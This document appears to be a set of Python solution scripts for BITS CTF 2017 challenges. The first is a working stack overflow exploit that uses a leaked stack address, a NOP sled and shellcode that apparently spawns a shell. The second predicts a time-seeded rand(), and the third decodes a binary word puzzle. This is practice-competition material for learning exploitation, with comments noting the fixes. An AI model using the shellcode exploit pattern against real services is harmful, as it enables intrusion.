BITS CTF 2017
#! /usr/bin/env python3 | |
import sys | |
import struct | |
from telnetlib import Telnet | |
def p64(addr):
    """Pack *addr* as an unsigned 64-bit little-endian value (8 bytes).

    ``struct.pack`` raises ``struct.error`` when *addr* does not fit in an
    unsigned 64-bit integer.
    """
    little_endian_u64 = '<Q'
    return struct.pack(little_endian_u64, addr)
def exploit(tn):
    """Send the crafted input to the port-1330 service, then go interactive.

    The first 14 bytes received are parsed as a hexadecimal integer
    (``stack``). The data written back is, in order: a run of filler ``A``
    bytes, the 8-byte little-endian value ``stack + 128``, 256 bytes of
    0x90, and the ``sc`` blob.

    NOTE(review): the service binary is not shown here. The layout suggests
    it prints a stack address on connect and copies input into a fixed-size
    stack buffer without a length check -- confirm against the binary. If
    so, the fixes on the service side are a bounded read, a stack protector,
    a non-executable stack, and not disclosing addresses to the client.
    """
    greeting = tn.read_some()
    # Only the leading 14 bytes are parsed; anything after them is ignored.
    stack = int(greeting[:14], 16)

    filler = b'AAAAAAAAAAAAAAAAAAAAAAAA'
    # NOTE(review): opaque 27-byte machine-code blob, reproduced unchanged;
    # disassemble it to confirm what it does before relying on any description.
    sc = b'\x31\xc0\x48\xbb\xd1\x9d\x96\x91\xd0\x8c\x97\xff\x48\xf7\xdb\x53\x54\x5f\x99\x52\x57\x54\x5e\xb0\x3b\x0f\x05'

    pieces = (filler, p64(stack + 128), b'\x90' * 256, sc)
    tn.write(b''.join(pieces))
    tn.interact()
def main(argc, argv):
    """Connect to the local or remote instance on port 1330 and run exploit().

    Exactly one argument is expected: ``r`` selects the remote CTF host and
    any other value selects ``localhost``. With a wrong argument count the
    usage line is printed and the process exits with status 1.
    """
    if argc != 2:
        print('python {} l|r'.format(argv[0]))
        sys.exit(1)

    # NOTE: telnetlib was removed from the standard library in Python 3.13,
    # so this script needs an older interpreter.
    host = 'bitsctf.bits-quark.org' if argv[1] == 'r' else 'localhost'
    exploit(Telnet(host, 1330))


if __name__ == '__main__':
    main(len(sys.argv), sys.argv)
from ctypes import * | |
from telnetlib import Telnet | |
def exploit(tn):
    """Answer 30 rounds with values from the local libc rand(), then interact.

    The local libc generator is seeded through srand() with the value
    returned by time(). For each of 30 rounds the script waits for the
    ``round : `` prompt and sends ``rand() & 15`` as a decimal line.

    NOTE(review): the service is not shown; the script presumably relies on
    it seeding rand() from the wall clock in the same second. A time-seeded
    rand() is predictable to any client with a synchronised clock, so values
    that must be unguessable belong to the OS CSPRNG (getrandom(),
    /dev/urandom) instead.

    NOTE(review): time() is called here without its pointer argument; the C
    prototype is time(time_t *), and ``libc.time(None)`` would pass NULL
    explicitly.
    """
    libc = CDLL("libc.so.6")
    seed = libc.time()
    libc.srand(seed)

    rounds = 30
    for _ in range(rounds):
        tn.read_until(b'round : ')
        guess = libc.rand() & 15  # keep only the low four bits (0..15)
        tn.write(b'%d\n' % guess)
    tn.interact()
def main():
    """Open a Telnet session to the CTF service on port 1335 and run exploit()."""
    remote = ('bitsctf.bits-quark.org', 1335)
    session = Telnet(*remote)
    exploit(session)


if __name__ == '__main__':
    main()
#! /usr/bin/env python3 | |
import binascii | |
import sys | |
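def _decode_words(text):
    """Decode the ZERO/ONE words hidden in *text* into the string they spell.

    Only upper-case characters of *text* are kept. Within that run every
    ``ZERO`` becomes ``0`` and every ``ONE`` becomes ``1``; the result is
    read as one base-2 integer, rendered as hexadecimal and decoded as text.

    Raises:
        ValueError: if anything other than binary digits is left after the
            replacements (including an empty result).
        UnicodeDecodeError: if the decoded bytes are not valid UTF-8.
    """
    letters = ''.join(ch for ch in text if ch.isupper())
    bits = letters.replace('ZERO', '0').replace('ONE', '1')

    hex_digits = '%x' % int(bits, 2)
    # '%x' drops leading zeros, so a first byte below 0x10 produces an odd
    # number of digits, which unhexlify() rejects; pad to whole bytes.
    if len(hex_digits) % 2:
        hex_digits = '0' + hex_digits
    return binascii.unhexlify(hex_digits).decode()


def main():
    """Read ``final.txt`` from the working directory and print the decoded text."""
    with open('final.txt', 'r') as f:
        data = f.read()
    print(_decode_words(data))


if __name__ == '__main__':
    main()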